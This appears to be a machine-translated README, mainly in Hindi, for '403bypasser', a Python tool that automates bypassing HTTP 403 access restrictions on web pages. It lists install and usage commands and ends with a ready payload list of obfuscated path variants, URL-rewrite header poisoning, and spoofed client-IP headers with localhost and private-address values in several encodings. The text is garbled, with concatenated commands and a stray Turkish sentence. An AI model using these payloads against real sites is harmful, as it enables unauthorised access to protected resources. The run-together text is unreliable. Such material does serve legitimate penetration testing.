
HTTP 403 पहुँच नियंत्रण बायपास तकनीकों को स्वचालित करता है, जिसमें हेडर मैनिपुलेशन, पथ अस्पष्टीकरण और HTTP विधि रूपांतरण का उपयोग वेब एप्लिकेशन सुरक्षा परीक्षण के लिए किया जाता है।

403bypasser, hedef sayfalardaki erişim kontrolü kısıtlamalarını aşmak için kullanılan teknikleri otomatikleştirir. Bu araç geliştirilmeye devam edecektir, katkılara açıktır.
403bypasser लक्ष्य पृष्ठों पर पहुँच नियंत्रण प्रतिबंधों को दरकिनार करने के लिए उपयोग की जाने वाली तकनीकों को स्वचालित करता है। 403bypasser में सुधार जारी रहेगा और यह योगदान के लिए खुला है।
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txt चलाकर आवश्यक मॉड्यूल स्थापित करें।तर्क:
| तर्क | विवरण | उदाहरण | नोट |
|---|---|---|---|
| -u | स्कैन करने के लिए एकल URL | http://example.com or http://example.com/ | ये सभी उदाहरण उपयोग समान रूप से व्याख्यायित किए जाते हैं |
| -U | URL की सूची का पथ | ./urllist.txt, ../../urllist.txt, आदि। | बस वह पथ प्रदान करें जहाँ फ़ाइल स्थित है :) |
| -d | स्कैन करने के लिए एकल निर्देशिका | admin or /admin or admin/ or /admin/ | ये सभी उदाहरण उपयोग समान रूप से व्याख्यायित किए जाते हैं |
| -D | निर्देशिकाओं की सूची का पथ | ./dirlist.txt, ../../dirlist.txt, आदि। | बस वह पथ प्रदान करें जहाँ फ़ाइल स्थित है :) |
उपयोग 1: python3 403bypasser.py -u https://example.com -d /secret
उपयोग 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
उपयोग 3: python3 403bypasser.py -U urllist.txt -d /secret
उपयोग 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
महत्वपूर्ण नोट: निम्नलिखित सभी को समान रूप से व्याख्यायित किया जाता है। इसलिए, आप किस पैटर्न का उपयोग करते हैं, यह सिर्फ प्राथमिकता का मामला है।
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretचूंकि पायथन एक क्रॉस-प्लेटफ़ॉर्म भाषा है, इसलिए कोई इस प्रोग्राम को विभिन्न ऑपरेटिंग सिस्टमों पर चला सकता है।
प्रोग्राम का आउटपुट (वर्तमान निर्देशिका में) इनपुट के रूप में दिए गए डोमेन नाम के नाम वाली फ़ाइल में सहेजा जाता है।
उदाहरण के लिए:
python3 403bypasser.py -u https://example.com -d /secret दिया जाता है। तब आउटपुट वर्तमान निर्देशिका में example.txt में सहेजा जाता है।
v2.0 में बदलाव: इस संस्करण में काफी बदलाव किए गए हैं। प्रोजेक्ट को बैश से Python 3 पर पूरी तरह से स्थानांतरित कर दिया गया है। नई और विविध तकनीकें जोड़ी गई हैं।
v1.1 में बदलाव: अब तर्कों के माध्यम से इनपुट के रूप में फ़ाइलों (सूचियों) को 403bypasser को पास करना संभव है। इसके अलावा, दो और परीक्षण मामले जोड़े गए:
X-Original-URL और 2) X-Rewrite-URL हेडर के साथ पॉइज़निंग।/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretहेडर:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPमान:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1